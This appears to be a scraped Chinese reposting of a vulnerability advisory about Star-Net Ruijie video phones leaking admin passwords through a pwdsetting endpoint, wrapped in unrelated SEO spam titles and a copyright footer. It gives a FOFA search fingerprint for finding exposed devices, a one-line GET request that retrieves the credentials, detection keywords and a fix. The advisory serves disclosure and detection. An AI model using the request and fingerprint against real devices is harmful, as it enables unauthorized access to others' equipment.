当前位置: 首页> 游戏> 评测 > 长春师范大学_石家庄建设银行网站_seo静态页源码_技能培训机构排名前十

长春师范大学_石家庄建设银行网站_seo静态页源码_技能培训机构排名前十

时间:2025/7/13 13:03:00来源:https://blog.csdn.net/shelter1234567/article/details/145521965 浏览次数:0次
长春师范大学_石家庄建设银行网站_seo静态页源码_技能培训机构排名前十

星网锐捷 视频话机设备pwdsetting管理密码信息泄漏

漏洞描述

星网锐捷视频话机设备 泄露管理员密码,攻击者可利用密码直接进入后台配置页面,执行恶意操作,进行一步攻击。

威胁等级: 高危

漏洞分类: 信息泄露

涉及厂商及产品:星网锐捷:星网锐捷视频话机设备 (硬件)

应用指纹及检出思路

匹配源代码 /console/index.html?time= 即可

fofa:body="/console/index.html?time="

漏洞复现

GET /console/secure/pwdsetting HTTP/1.1
Host:

检测思路

检测json数据关键字段即可。如cOldPasswd webport adminPasswd

修复建议

设置访问控制策略,禁用此接口

关键字:长春师范大学_石家庄建设银行网站_seo静态页源码_技能培训机构排名前十

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: